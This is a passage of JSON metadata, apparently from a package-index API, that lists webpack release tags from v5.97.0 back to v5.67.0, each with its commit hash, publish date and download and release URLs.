.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/